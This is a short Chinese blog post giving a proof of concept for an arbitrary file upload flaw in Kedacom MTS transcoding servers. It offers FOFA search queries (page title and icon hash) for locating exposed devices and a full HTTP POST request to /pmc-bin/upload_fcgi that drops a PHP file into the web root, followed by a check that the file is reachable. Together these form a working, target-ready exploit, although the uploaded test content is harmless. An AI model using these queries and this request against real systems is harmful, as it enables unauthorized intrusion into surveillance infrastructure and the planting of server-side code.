Babing
Published on 2024-08-30 / 16 Visits
0
0

K3-1科达-Kedacom系统-文件上传

K3-1科达-Kedacom系统-文件上传

漏洞描述:

KEDACOM MTS转码服务器存在任意文件上传漏洞,攻击这通过漏洞可以读取服务器任意信息。

影响版本:

  • 科达-Kedacom系统

网站图片:

image-20240625203639435

网络测绘:

fofa语法:

title=“监控管理客户端”

icon_hash=“-908445132”

漏洞复现:

payload:

POST /pmc-bin/upload_fcgi?uploadDir=/&uploadName=aaa.php HTTP/1.1
Host: 
Pragma: no-cache
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: 164

----WebKitFormBoundary
Content-Disposition: form-data; name="Filedata": filename="aaa"
Content-Type: application/octet-stream

test123
----WebKitFormBoundary--

效果图:
image.png

访问根目录的 aaa.php,看到上传的文件
image.png


Comment